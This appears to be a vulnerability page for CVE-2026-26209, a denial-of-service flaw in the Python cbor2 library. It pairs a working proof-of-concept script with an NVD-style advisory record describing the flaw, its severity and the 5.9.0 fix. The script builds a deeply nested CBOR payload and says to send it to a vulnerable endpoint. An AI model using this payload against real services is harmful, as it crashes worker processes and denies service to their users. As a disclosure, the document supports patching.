CVE-2026-26209

# PoC for CVE-2026-26209 # Generates a deeply nested CBOR payload to trigger RecursionError def generate_malicious_cbor(depth=100000): """ Generates a CBOR payload with 'depth' levels of nested arrays. CBOR format for an array with one element is 0x81. """ # Start with a simple integer (e.g., 0) payload = b'\x00' # Prepend the array byte 'depth' times for _ in range(depth): payload = b'\x81' + payload return payload if __name__ == "__main__": print("Generating malicious CBOR payload...") # Create a payload with 100,000 nested arrays malicious_data = generate_malicious_cbor(100000) print(f"Payload size: {len(malicious_data)} bytes") # Save to file with open("exploit.cbor", "wb") as f: f.write(malicious_data) print("Saved to exploit.cbor. Send this to a vulnerable cbor2.loads() endpoint.") # To test locally (will crash if vulnerable): # import cbor2 # cbor2.loads(malicious_data)

{"cve": {"id": "CVE-2026-26209", "sourceIdentifier": "[email protected]", "published": "2026-03-23T19:16:39.530", "lastModified": "2026-03-25T17:56:15.630", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "cbor2 provides encoding and decoding for the Concise Binary Object Representation (CBOR) serialization format. Versions prior to 5.9.0 are vulnerable to a Denial of Service (DoS) attack caused by uncontrolled recursion when decoding deeply nested CBOR structures. This vulnerability affects both the pure Python implementation and the C extension `_cbor2`. The C extension relies on Python's internal recursion limits `Py_EnterRecursiveCall` rather than a data-driven depth limit, meaning it still raises `RecursionError` and crashes the worker process when the limit is hit. While the library handles moderate nesting levels, it lacks a hard depth limit. An attacker can supply a crafted CBOR payload containing approximately 100,000 nested arrays `0x81`. When `cbor2.loads()` attempts to parse this, it hits the Python interpreter's maximum recursion depth or exhausts the stack, causing the process to crash with a `RecursionError`. Because the library does not enforce its own limits, it allows an external attacker to exhaust the host application's stack resource. In many web application servers (e.g., Gunicorn, Uvicorn) or task queues (Celery), an unhandled `RecursionError` terminates the worker process immediately. By sending a stream of these small (<100KB) malicious packets, an attacker can repeatedly crash worker processes, resulting in a complete Denial of Service for the application. Version 5.9.0 patches the issue."}, {"lang": "es", "value": "cbor2 proporciona codificación y decodificación para el formato de serialización Concise Binary Object Representation (CBOR). Las versiones anteriores a la 5.9.0 son vulnerables a un ataque de denegación de servicio (DoS) causado por recursión incontrolada al decodificar estructuras CBOR profundamente anidadas. Esta vulnerabilidad afecta tanto a la implementación pura de Python como a la extensión C '_cbor2'. La extensión C se basa en los límites de recursión internos de Python 'Py_EnterRecursiveCall' en lugar de un límite de profundidad basado en datos, lo que significa que aún genera 'RecursionError' y bloquea el proceso de trabajo cuando se alcanza el límite. Aunque la biblioteca maneja niveles de anidamiento moderados, carece de un límite de profundidad estricto. Un atacante puede proporcionar una carga útil CBOR manipulada que contenga aproximadamente 100.000 arrays anidados '0x81'. Cuando 'cbor2.loads()' intenta analizar esto, alcanza la profundidad máxima de recursión del intérprete de Python o agota la pila, lo que provoca que el proceso falle con un 'RecursionError'. Debido a que la biblioteca no impone sus propios límites, permite que un atacante externo agote el recurso de pila de la aplicación anfitriona. En muchos servidores de aplicaciones web (p. ej., Gunicorn, Uvicorn) o colas de tareas (Celery), un 'RecursionError' no manejado termina el proceso de trabajo inmediatamente. Al enviar un flujo de estos pequeños paquetes maliciosos (&lt;100KB), un atacante puede bloquear repetidamente los procesos de trabajo, lo que resulta en una denegación de servicio completa para la aplicación. La versión 5.9.0 corrige el problema."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-674"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:agronholm:cbor2:*:*:*:*:*:python:*:*", "versionEndExcluding": "5.9.0", "matchCriteriaId": "DAC7F8CF-AB35-48ED-B4F6-5DEDFCE12F61"}]}]}], "references": [{"url": "https://github.com/agronholm/cbor2/commit/e61a5f365ba610d5907a0ae1bc72769bba34294b", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/agronholm/cbor2/pull/275", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/agronholm/cbor2/releases/tag/5.9.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/agronholm/cbor2/security/advisories/GHSA-3c37-wwvx-h642", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}